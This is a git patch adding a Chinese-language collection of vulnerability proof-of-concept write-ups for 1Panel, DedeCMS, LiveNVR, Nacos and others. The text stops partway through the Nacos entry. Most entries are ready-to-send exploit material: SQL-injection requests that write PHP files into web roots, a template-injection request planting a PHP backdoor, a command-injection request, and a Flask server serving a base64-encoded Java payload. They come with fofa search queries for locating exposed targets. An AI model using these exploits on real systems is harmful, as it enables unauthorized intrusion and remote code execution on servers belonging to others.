From 39e141fc5793c8da093cc284f4121ed3c7c21ef2 Mon Sep 17 00:00:00 2001 From: wy876 Date: Sat, 20 Jul 2024 16:54:52 +0800 Subject: [PATCH] =?UTF-8?q?7.20=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...46\274\217\346\264\236(CVE-2024-39911).md" | 74 ++++++++ ...47\350\241\214\346\274\217\346\264\236.md" | 42 +++++ ...47\350\241\214\346\274\217\346\264\236.md" | 55 ++++++ ...77\351\227\256\346\274\217\346\264\236.md" | 32 ++++ ...47\350\241\214\346\274\217\346\264\236.md" | 141 +++++++++++++++ ...346\274\217\346\264\236(CVE-2024-6646).md" | 21 +++ README.md | 28 +++ ...46\274\217\346\264\236(CVE-2024-36412).md" | 28 +++ ...46\274\217\346\264\236(CVE-2024-21006).md" | 158 ++++++++++++++++ _sidebar.md | 168 +++++++----------- ...46\274\217\346\264\236(CVE-2024-39914).md" | 25 +++ ...346\274\217\346\264\236(DVB-2024-6594).md" | 31 ++++ ...50\345\205\245\346\274\217\346\264\236.md" | 39 ++++ ...50\345\205\245\346\274\217\346\264\236.md" | 38 ++++ ...47\350\241\214\346\274\217\346\264\236.md" | 20 +++ ...50\345\205\245\346\274\217\346\264\236.md" | 32 ++++ ...31\345\205\245\346\274\217\346\264\236.md" | 43 +++++ ...50\345\205\245\346\274\217\346\264\236.md" | 47 +++++ ...50\345\205\245\346\274\217\346\264\236.md" | 24 +++ ...73\345\217\226\346\274\217\346\264\236.md" | 54 ++++++ ...47\350\241\214\346\274\217\346\264\236.md" | 38 ++++ ...12\344\274\240\346\274\217\346\264\236.md" | 44 +++++ ...50\345\205\245\346\274\217\346\264\236.md" | 29 +++ ...25\350\277\207\346\274\217\346\264\236.md" | 19 ++ ...73\345\217\226\346\274\217\346\264\236.md" | 31 ++++ ...345\217\260RCE\346\274\217\346\264\236.md" | 56 ++++++ ...50\345\205\245\346\274\217\346\264\236.md" | 21 +++ 27 files changed, 1238 insertions(+), 100 deletions(-) create mode 100644 "1Panel\351\235\242\346\235\277\346\234\200\346\226\260\345\211\215\345\217\260RCE\346\274\217\346\264\236(CVE-2024-39911).md" create mode 100644 "DedeCMSV5.7.114\345\220\216\345\217\260article_template_rand.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 "DedeCMSV5.7.114\345\220\216\345\217\260sys_verizes.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 "LiveNVR\346\265\201\345\252\222\344\275\223\346\234\215\345\212\241\350\275\257\344\273\266\346\216\245\345\217\243\345\255\230\345\234\250\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" create mode 100644 "Nacos\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 "Netgear-WN604\346\216\245\345\217\243downloadFile.php\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236(CVE-2024-6646).md" create mode 100644 "SuiteCRM\347\263\273\347\273\237\346\216\245\345\217\243responseEntryPoint\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-36412).md" create mode 100644 "WebLogic\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-21006).md" create mode 100644 "fogproject\347\263\273\347\273\237\346\216\245\345\217\243export.php\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-39914).md" create mode 100644 "\344\272\221\350\257\276\347\275\221\346\240\241\347\263\273\347\273\237\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236(DVB-2024-6594).md" create mode 100644 "\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NetSecConfigAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NoticeAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\345\205\250\346\201\257AI\347\275\221\347\273\234\350\277\220\347\273\264\345\271\263\345\217\260ajax_cloud_router_config.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 "\345\271\277\350\201\224\350\276\276OA\346\216\245\345\217\243ArchiveWebService\345\255\230\345\234\250XML\345\256\236\344\275\223\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\346\213\274\345\233\242\351\233\266\345\224\256\345\225\206\345\237\216\347\263\273\347\273\237\345\211\215\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\346\237\220\350\207\252\345\212\250\345\217\221\345\215\241\347\275\221alipay_notify.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\346\263\233\345\276\256E-office-10\346\216\245\345\217\243leave_record.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\346\263\233\345\276\256e-cology9\346\216\245\345\217\243XmlRpcServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" create mode 100644 "\346\265\267\346\264\213CMS\345\220\216\345\217\260admin_smtp.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 "\347\224\250\345\217\213CRM\345\256\242\346\210\267\345\205\263\347\263\273\347\256\241\347\220\206\347\263\273\347\273\237import.php\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" create mode 100644 "\347\224\250\345\217\213GRP-A-Cloud\346\224\277\345\272\234\350\264\242\345\212\241\344\272\221\347\263\273\347\273\237\346\216\245\345\217\243selectGlaDatasourcePreview\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" create mode 100644 "\347\224\250\345\217\213NC-Cloud\346\226\207\344\273\266\346\234\215\345\212\241\345\231\250\347\224\250\346\210\267\347\231\273\351\231\206\347\273\225\350\277\207\346\274\217\346\264\236.md" create mode 100644 "\350\207\264\350\277\234\344\272\222\350\201\224AnalyticsCloud\345\210\206\346\236\220\344\272\221\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" create mode 100644 "\350\223\235\345\207\214KEP\345\211\215\345\217\260RCE\346\274\217\346\264\236.md" create mode 100644 "\350\265\233\350\223\235\344\274\201\344\270\232\347\256\241\347\220\206\347\263\273\347\273\237GetExcellTemperature\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" diff --git "a/1Panel\351\235\242\346\235\277\346\234\200\346\226\260\345\211\215\345\217\260RCE\346\274\217\346\264\236(CVE-2024-39911).md" "b/1Panel\351\235\242\346\235\277\346\234\200\346\226\260\345\211\215\345\217\260RCE\346\274\217\346\264\236(CVE-2024-39911).md" new file mode 100644 index 0000000..7d6ff6b --- /dev/null +++ "b/1Panel\351\235\242\346\235\277\346\234\200\346\226\260\345\211\215\345\217\260RCE\346\274\217\346\264\236(CVE-2024-39911).md" @@ -0,0 +1,74 @@ +# 1Panel面板最新前台RCE漏洞(CVE-2024-39911) + +**1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。且深度集成开源建站软件 WordPress 和 Halo.** + +## 0x1 测试版本 + +专业版 v1.10.10-lts +社区版 v1.10.10-lts +1panel/openresty:1.21.4.3-3-1-focal + +## 0x2 影响范围 + +网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal +WAF功能影响 <= 1panel/openresty:1.21.4.3-3-1-focal + +## 0x3 题外话 + +具体测试/发现过程在 `https://blog.mo60.cn/index.php/archives/1Panel_SQLinjection2Rce.html` 有兴趣的大佬们可以看看 + +## 0x4 网站监控功能GetShell + +利用条件: + +- 专业版,并开启网站监控功能 +- 关闭waf功能 +- 安装有1P-openresty容器且搭建有php环境网站 + +默认网站路径格式如下,这个路径是在op容器里面的路径 + +``` +/www/sites/网站代号(默认为域名)/index/ +``` + + + +通过sql注入导出文件到网站路径下 + +```yaml +GET / HTTP/1.1 +Host: 192.168.99.6 +User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('');# +``` + + + +然后来到网站路径下可以看到我们写入的文件 + +[![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407190936858.png)](https://private-user-images.githubusercontent.com/103053746/338056404-4c64d116-6187-4661-8e9e-d3ae21b189bd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjEzNTMyMzYsIm5iZiI6MTcyMTM1MjkzNiwicGF0aCI6Ii8xMDMwNTM3NDYvMzM4MDU2NDA0LTRjNjRkMTE2LTYxODctNDY2MS04ZTllLWQzYWUyMWIxODliZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzE5JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcxOVQwMTM1MzZaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYWU1MjIyZmFiMzIwNzI1Yzg1NzQxN2JlNTMwODM5MjlmM2QwNDY5ZGRiZWFkYWU5YTliNDYyZjAyZjAyZWM4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.xjt8TbyhsjYoiHzeUd26xnyhwMIoC7sjLAy4pM6oB0c) + +访问发现成功输出blog.mo60.cn 的md5值,成功执行代码 + +[![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407190936869.png)](https://private-user-images.githubusercontent.com/103053746/338056240-52bc1681-bba4-4e50-bca5-3a1a2821eb8f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjEzNTMyMzYsIm5iZiI6MTcyMTM1MjkzNiwicGF0aCI6Ii8xMDMwNTM3NDYvMzM4MDU2MjQwLTUyYmMxNjgxLWJiYTQtNGU1MC1iY2E1LTNhMWEyODIxZWI4Zi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzE5JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcxOVQwMTM1MzZaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xOWNkYmUyMjc2NTFiMjNiNTMxMzVhMDgyODBiMmEyMTEwNmFiYTM3ZDY2OTczMGNjZGE3NGRiYTVhOGE0ZTUwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.w-QHDxXdU-6bvX0VL-Bk54sB4XcCdIpj4NAYhvV2hy8) + +## 0x5 Waf功能 + +利用条件: + +- 开启waf功能 +- 安装有1P-openresty容器且搭建有php环境网站 + +发送后即可成功写入文件 + +```yaml +GET /.git/config HTTP/1.1 +Host: 192.168.99.6 +User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('');# +Connection: close +``` + + + +## 漏洞来源 + +- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7m53-pwp6-v3f5 \ No newline at end of file diff --git "a/DedeCMSV5.7.114\345\220\216\345\217\260article_template_rand.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/DedeCMSV5.7.114\345\220\216\345\217\260article_template_rand.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..ad1c5d5 --- /dev/null +++ "b/DedeCMSV5.7.114\345\220\216\345\217\260article_template_rand.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,42 @@ +# DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 + +DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然article_template_rand.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意命令并获取系统权限。 + +## fofa + +```yaml +app="DedeCMS网站内容管理系统" +``` + +## poc + +```yaml +POST /dede/article_template_rand.php HTTP/1.1 +Host: 127.0.0.11 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 1065 +Origin: http://127.0.0.11 +Connection: close +Referer: http://127.0.0.11/dede/article_template_rand.php +Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; _csrf_name_236f0c58=8f0d4c50bfce77f693ce4b8d93af8be7; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=23bfa72eb66439a6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720185221; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d2b9bcefe628ee47; ENV_GOBACK_URL=%2Fdede%2Fsys_admin_user.php +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: iframe +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Priority: u=4 + +dopost=save&token=7fa44bfa91d7f797b4c983c76f7c9f9e&templates=%3C%3Fphp%0D%0A%0D%0A%2F%2F%E8%BF%99%E4%B8%AA%E5%80%BC%E4%B8%BA+0+%E8%A1%A8%E7%A4%BA%E5%85%B3%E9%97%AD%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C+%E4%B8%BA+1+%E8%A1%A8%E7%A4%BA%E5%BC%80%E5%90%AF%0D%0A%24cfg_tamplate_rand+%3D+0%3B%0D%0A%0D%0A%2F%2F%E6%A8%A1%E6%9D%BF%E6%95%B0%E7%BB%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%A2%9E%E5%8A%A0%EF%BC%8C%E6%8C%89%E8%BF%99%E4%B8%AA%E6%A0%BC%E5%BC%8F%E5%A2%9E%E5%8A%A0%E6%88%96%E4%BF%AE%E6%94%B9%E5%8D%B3%E5%8F%AF%28%E5%BF%85%E9%A1%BB%E7%A1%AE%E4%BF%9D%E8%BF%99%E4%BA%9B%E6%A8%A1%E6%9D%BF%E6%98%AF%E5%AD%98%E5%9C%A8%E7%9A%84%29%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%95%B0%E9%87%8F%E5%BF%85%E9%A1%BB%E4%B8%BA2%E4%B8%AA%E6%88%96%E4%BB%A5%E4%B8%8A%E3%80%82%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article1.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article2.htm%27%3B%0D%0A%24a+%3D+%27_POST%27%3B%0D%0A%24%24a%5B1%5D%28%24%24a%5B0%5D%29%3B%0D%0A%3F%3E%0D%0A&imageField1.x=6&imageField1.y=9 +``` + +![2024711-4](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191223297.png) + +![2024711-5](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191223648.png) + +## 漏洞来源 + +- https://gitee.com/fushuling/cve/blob/master/dedeCMS%20V5.7.114%20article_template_rand.php%20code%20injection.md \ No newline at end of file diff --git "a/DedeCMSV5.7.114\345\220\216\345\217\260sys_verizes.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/DedeCMSV5.7.114\345\220\216\345\217\260sys_verizes.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..4ee9397 --- /dev/null +++ "b/DedeCMSV5.7.114\345\220\216\345\217\260sys_verizes.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,55 @@ +# DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞 + +DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然sys_verizes.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意命令并获得系统权限。 + +## fofa + +```yaml +app="DedeCMS网站内容管理系统" +``` + +## poc + +```yaml +GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20`whoami`}} HTTP/1.1 +Host: 127.0.0.11 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720327720; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c5e6c12f26661f56; _csrf_name_236f0c58=6d608f0ee0d0e0b59410565dfeec6b2b; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=bc5881b7b91f1bd9 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=1 +``` + +![2024712-6](https://gitee.com/fushuling/cve/raw/master/2024712-6.png) + + + +``` +GET /dede/sys_verifies.php?action=down&curfile=1 HTTP/1.1 +Host: 127.0.0.11 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720327720; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c5e6c12f26661f56; _csrf_name_236f0c58=6d608f0ee0d0e0b59410565dfeec6b2b; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=bc5881b7b91f1bd9 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=1 +``` + +![20224712-8](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191227418.png) + +## 漏洞来源 + +- ![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191227658.png) \ No newline at end of file diff --git "a/LiveNVR\346\265\201\345\252\222\344\275\223\346\234\215\345\212\241\350\275\257\344\273\266\346\216\245\345\217\243\345\255\230\345\234\250\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" "b/LiveNVR\346\265\201\345\252\222\344\275\223\346\234\215\345\212\241\350\275\257\344\273\266\346\216\245\345\217\243\345\255\230\345\234\250\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" new file mode 100644 index 0000000..6581b2c --- /dev/null +++ "b/LiveNVR\346\265\201\345\252\222\344\275\223\346\234\215\345\212\241\350\275\257\344\273\266\346\216\245\345\217\243\345\255\230\345\234\250\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" @@ -0,0 +1,32 @@ +# LiveNVR流媒体服务软件接口存在未授权访问漏洞 + +livenvr 青柿视频管理系统 channeltree 存在未授权访问漏洞。 + +## fofa + +```yaml +icon_hash="-206100324" +``` + +## hunter + +```yaml +web.icon=="7bfff01de80c14288ff385cd7db83c56" +``` + +## poc + +```yaml +GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1 +Host: +``` + +![image-20240719130739033](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191307146.png) + +接口访问` /#/screen ` 可以看到后台信息了 + +![image-20240719130703174](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191307314.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/whXXvwzZpfj19B7unFCrjg \ No newline at end of file diff --git "a/Nacos\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/Nacos\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..0ab9223 --- /dev/null +++ "b/Nacos\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,141 @@ +# Nacos远程代码执行漏洞 + +## 影响版本 + +```yaml +nacos 2.3.2 +nacos 2.4.0 +``` + +## fofa + +```yaml +title="Nacos" +``` + +## poc + +### service.py + +```python +import base64 +from flask import Flask, send_file,Response +import config + +payload = b'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